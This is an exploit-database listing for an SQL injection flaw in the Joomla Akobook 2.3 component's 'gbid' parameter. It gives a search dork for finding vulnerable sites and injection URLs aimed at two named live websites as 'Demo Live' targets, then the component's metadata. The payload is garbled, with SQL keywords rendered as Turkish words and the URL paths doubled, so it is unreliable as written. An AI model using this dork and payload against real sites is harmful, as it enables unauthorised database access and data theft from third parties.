Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability

2009-06-09T00:00:00
ID 1337DAY-ID-5336
Type zdt
Reporter Ab1i
Modified 2009-06-09T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
Joomla Component Akobook 2.3 (gbid) SQL Injection Vulnerability
===============================================================


Joomla Component com_akobook Vulnerability
----------------------------------------------------------------------
 ###################################################
 [+] Author        :  Ab1i
 [+] Dork  : inurl:index.php?option=com_akobook
 ###################################################
________________________________________________________
Example:
http://localHost/path/components/index.php?option=com_akobook&Itemid=36= ( SQL code )

Demo Live (1):
http://lesnyak.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20secin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
Demo Live (2):
http://www.prostatitunet.ru/index.php?option=com_akobook&Itemid=31/index.php?option=com_akobook&Itemid=36&func=sign&action=reply&gbid=-1%20+%20birligi%20+%20+1,2,3,4,5,6,7,8,9%20secin%20,%2010,11,12,13,14,15,%2016,17,18,19%20/%20*
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

<name>AkoBook</name>
<creationDate>09.04.2006</creationDate>
<author>Melikyan Sergey aka SaD</author>
<copyright> This component is released under the GNU/GPL License.  </copyright>
<authorEmail>[email protected]</authorEmail>
<authorUrl>http://saddo.ru/</authorUrl>
<version>SE 2.3</version>



#  0day.today [2018-02-07]  #